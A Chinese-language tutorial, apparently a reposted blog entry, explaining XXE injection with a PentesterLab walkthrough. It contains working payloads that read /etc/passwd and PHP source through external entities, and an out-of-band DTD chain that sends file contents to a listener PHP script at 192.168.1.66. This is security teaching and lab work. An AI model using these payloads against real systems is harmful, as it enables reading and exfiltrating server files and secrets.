XXE漏洞学习

0x00 XXE漏洞介绍:

背景:2018-7-4 微信支付SDK漏洞(XXE漏洞),攻击者可以获取服务器中目录结构,文件内容,eg:代码,各种 私钥。敏感数据泄露

0x01什么是xxe漏洞:

XXE (XML External Entity injection)XML 外部实体注入漏洞,如果XML 文件在引用外部实体时候,可以沟通构造恶意内容,可以导致读取任意文件,命令执行和对内网的攻击,这就是XXE漏洞.

XML Extwrnal Entity,也就是XML外部实体注入攻击

  1. 漏洞存在于XML中
  2. 外部 漏洞的条件 实体通过SYStem加载外部资源 DTD也可以通过外部应用
  3. ENtity 实体 :漏洞的具体位置 变量
外部引用必须被XML解释器解析才能加载

漏洞的利用过程和SSRF非常类似。漏洞的危害与ssrf几乎一致。

什么是XML?

  1. 可扩展标记语言:标记数据,定义数据类型
  2. 一种标记语言,类似于HTML(由标签组成<>)
  3. 宗旨是传输数据,而非显示数据。html被设计用来显示数据
  4. 标签没有被定义,需要自行定义标签
  5. 被设计为具有自我描述性
  6. 是W3c的推荐标准

区别:
1.XML可自定义标签
2.XML存储或传输数据
3,XML区分大小写
4.XML标签嵌套闭合比较严谨
5.必须要有根元素,如 (最外面的)
6.实体字符 类似于xss eg:<>由< 和 >表示
HTML目的是为了显示数据
元素代表标签:

XXE漏洞学习

XXE漏洞学习
XXE漏洞学习
第一行:定义note元素,定义了里面有to,from,heading,body这四个元素
XXE漏洞学习

ENtity 实体定义:在DTD下面 (实体就是个变量)
<!ENTITY free "nice"> &#x5B9A;&#x4E49;&#x4E86;&#x4E00;&#x4E2A;&#x5B9E;&#x4F53;&#x53EB;free &#xFF0C;free&#x91CC;&#x9762;&#x5B58;&#x4E86;&#x4E2A;nice&#xFF0C;&#x7C7B;&#x4F3C;&#x4E8E;&#x53D8;&#x91CF;&#x7684;&#x4F5C;&#x7528;
调用变量:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
<!ENTITY free "nice"> //&#x5185;&#x90E8;&#x5B9E;&#x4F53;
]>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>owen is &free;</body>

</note>

调用结果显示如下:

XXE漏洞学习

外部实体需要通过system引用
eg: //通过file协议

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
<!ENTITY free SYSTEM"file:///etc/passwd">
]>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>owen is &free;</body>

</note>

DTD通过外部引用的方法:(逻辑上可行,实际看情况)

<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>

将上述代码写入free.dtd文件中

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note SYSTEM "free.dtd"> //&#x8FD9;&#x91CC;&#x901A;&#x8FC7;system&#x6765;&#x5BF9;free.dtd&#x6587;&#x4EF6;&#x8FDB;&#x884C;&#x52A0;&#x8F7D;
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>owen is &free;</body>

</note>

导致文件读取,泄露服务器上的敏感数据 (前提条件是:XML文档能够被解析)
接下来的代码将展示XML文件如何被解析:

xxe.php文件:
<?php
$xml=file_get_contents("php://input");//**接收用户传过来的XML文档**
//通过php- input来捕获数据流 data ,将捕获到的内容存到xml中
$data = simplexml_load_string($xml) ;
// 把xml文档解析成simple xml element object对象
echo "<pre>" ;
print_r($data) ;
//&#x5C06;&#x89E3;&#x6790;&#x540E;&#x7684;&#x5BF9;&#x8C61;&#x6253;&#x5370;&#x5230;&#x516C;&#x5C4F;
echo "

” ;
?>

如何读取php文件:
php://filiter/read=convert.base64-encode/resource=xxe.php

当没有print_r($data);的情况下,即无回显,该如何解决呢?
解决方法:
1.获取数据,把数据内容保存到变量中 外部实体
2.获取前面取到的数据 (带外)oob

0x03实验环境搭建:

pentester lab(这里我设置的是桥接网络)

XXE漏洞学习

切换到root用户下:

XXE漏洞学习
XXE漏洞学习
然后再物理机上登入该虚拟机网站
XXE漏洞学习

0x04小思考:如何确认该网站存在xxe漏洞?

该网站是否能解析xml?
解决方法:
发送给他一个xml文档,如果该网站解析的话,说明存在xxe漏洞
如果加载了外部资源,说明存在xxe
1.通过bp,先截取数据包

XXE漏洞学习
发到重发器中(删除最低下username和helloo那一行)
XXE漏洞学习

添加xml文档(记得要空出一行)
同时将CONtent-Type中的内容修改成tetx/xml

XXE漏洞学习
返回结果如下,(返回200,说明页面成功显示)
XXE漏洞学习
同时查看bp中的Collaborator
XXE漏洞学习
发现外部资源(dnsLOG)被进行访问了,说明存在xxe漏洞
这里通过构建一个网站,将用户信息记录到txt上(思路)
 <?php
  $pass = $_GET['pass'];
   file_put_contents('pass.txt',$pass);//通过file_put_contents将pass的值记录到pass.txt上
 ?>

0X05实践版:

1.获取数据,把数据内容保存到变量中 外部实体 p1 =passwd(将p1作为参数)
2.OOB获取数据 p2 system http://192.168.1.66/xxe.php?pass = &p1(=passwd)//加载该资源的过程时,调用p1

具体代码实现:
xml文档:

<?xml version="1.0"?>
<!DOCTYPE e1 SYSTEM "http://192.168.1.66/test.dtd">//&#x58F0;&#x660E;&#x4E86;&#x5916;&#x90E8;&#x7684;dtd&#xFF0C;&#x56E0;&#x6B64;&#x8981;&#x5148;&#x5230;1.66&#x53BB;&#x5BFB;&#x627E;dtd&#xFF0C;&#x627E;&#x5230;&#x4EE5;&#x540E;&#x5F00;&#x59CB;&#x8C03;&#x7528;dtd&#x7684;&#x4EE3;&#x7801;
<foo>&e1;</foo>

dtd中代码作用:
1.获取数据,把数据内容保存到变量中 外部实体
2.OOB获取数据
先获取passwd,再将passwd发出去

先创建test.dtd

<!ENTITY %p1 SYSTEM"file:///etc/passwd">
<!ENTITY %p2 <!ENTITY e1 SYSTEM 'http://192.168.1.66/xxe.php?pass=%p1;'>">
%p2;

XXE漏洞学习

然后上传xml文档

XXE漏洞学习
结果存储再pass.txt文件中
XXE漏洞学习

Original: https://www.cnblogs.com/ZZslBl0g/p/16597661.html
Author: ZZslBl0g
Title: XXE漏洞学习

原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/578273/

转载文章受原作者版权保护。转载请注明原作者出处!

(0)

大家都在看

  • [ Python ] 音视频剪辑

    https://www.cnblogs.com/yeungchie/ 视频 提取视频 from moviepy.editor import * 从 MP4 文件提取 video =…

    Linux 2023年6月7日
    094
  • 海思3559 FFMPEG移植

    具体参考下面这篇帖子http://bbs.ebaina.com/forum.php?mod=viewthread&tid=79863&pid=156755&…

    Linux 2023年6月13日
    096
  • HTML笔记整理–下节

    欢迎来到HTML基础笔记下节部分! 内联样式 当特殊的样式需要应用到个别元素时,就可以使用内联样式。 使用内联样式的方法是在相关的标签中使用样式属性。样式属性可以包含任何 CSS …

    Linux 2023年6月13日
    083
  • MySQL之存储引擎、基本数据类型及约束条件

    一、存储引擎 数据库存储引擎是数据库底层软件组织,数据库管理系统(DBMS)使用数据引擎进行创建、查询、更新和删除数据。不同的存储引擎提供不同的存储机制、索引技巧、锁定水平等功能,…

    Linux 2023年6月14日
    093
  • 5.4 Linux Vim基本操作

    《Vim三种工作模式》一节给大家详细介绍了 Vim 的 3 种工作模式,本节来学习如何使用 Vim 编辑文件。 首先学习如何使用 Vim 打开文件。 Vim 打开文件 使用 Vim…

    Linux 2023年6月7日
    0101
  • MybatisPlus拓展——实现多数据源操作

    多数据源 适用:一般工作时候会有多个数据库,每个库对应不同的业务数据。程序如果每次数据都访问同一个数据库,该数据库压力很大访问会很慢。 1、导入依赖 com.baomidou dy…

    Linux 2023年6月7日
    080
  • 剑指offer计划26(字符串中等)—java

    1.1、题目1 剑指 Offer 20. 表示数值的字符串 1.2、解法 这题表示直接上大佬的题解把。。。。代码太长了。有限状态自动机。对状态机一无所知的我一脸懵 1.3、代码 c…

    Linux 2023年6月11日
    097
  • Java动态脚本Groovy,高级啊!

    前言:请各大网友尊重本人原创知识分享,谨记本人博客: 南国以南i 简介: Groovy是用于Java虚拟机的一种敏捷的动态语言,它是一种成熟的面向对象编程语言,既可以用于面向对象编…

    Linux 2023年6月14日
    0141
  • phpcms搜索给分页代码添加参数方法

    在使用PHPCMS开发网站时遇到了一个搜索功能,需要在搜索结果分页链接上添加一些传递的参数,不然不能够正确翻页。 方法: 找到\phpcms\libs\functions\glob…

    Linux 2023年6月13日
    0105
  • Redis启动时提示Creating Server TCP listening socket *:6379: bind: No error

    场景 启动redis-server时需要走配置文件,所以编写了bat脚本启动。 @echo off redis-server.exe redis.windows.conf exit…

    Linux 2023年5月28日
    0106
  • 如何使用 etcd 实现分布式 /etc 目录

    etcd 是一款兼具一致性和高可用性的键值数据库,简单、安全、快速、可信,目前是 Kubernetes 的首要数据存储。我们先来看一段 etcd 官方对于名字的解释。 The na…

    Linux 2023年6月14日
    0133
  • linux命令技巧

    linux命令文件夹处理: 1.cp 命令复制,修改名称(没有修改名称的直接命令,通过复制来修改名称)。 一般的命令很简单,cp -r dir1 /dir/ 这个命令是复制目录di…

    Linux 2023年6月13日
    0100
  • 编程入门之字符编码与乱码

    ——”为什么服务器收到的请求或者打开的文本文件有时会乱码?” ——”因为编码不对。” ——”编码的本质是什么?为什么编码…

    Linux 2023年6月13日
    091
  • frp实现Windows远程连接(docker)

    服务端配置 服务端拉镜像 docker pull snowdreamtech/frps 在某个目录下新建配置文件 frps.ini ,比如我是在/home/docker/frp目录…

    Linux 2023年6月8日
    095
  • 会计学包含的两种程序设计思想

    下班路上坐地铁的时候看了一本会计学的书,目前看了50多页。过程中,发现会计学和程序设计在思想上有惊人的相似之处。今天举两个例子做说明。 CR设计和账簿 CR设计介绍 CR设计就是只…

    Linux 2023年6月14日
    083
  • docker安装redis

    安装镜像 docker pull redis:7.0 下载配置文件 wget http://download.redis.io/redis-stable/redis.conf 修改…

    Linux 2023年6月7日
    0125
亲爱的 Coder【最近整理,可免费获取】👉 最新必读书单  | 👏 面试题下载  | 🌎 免费的AI知识星球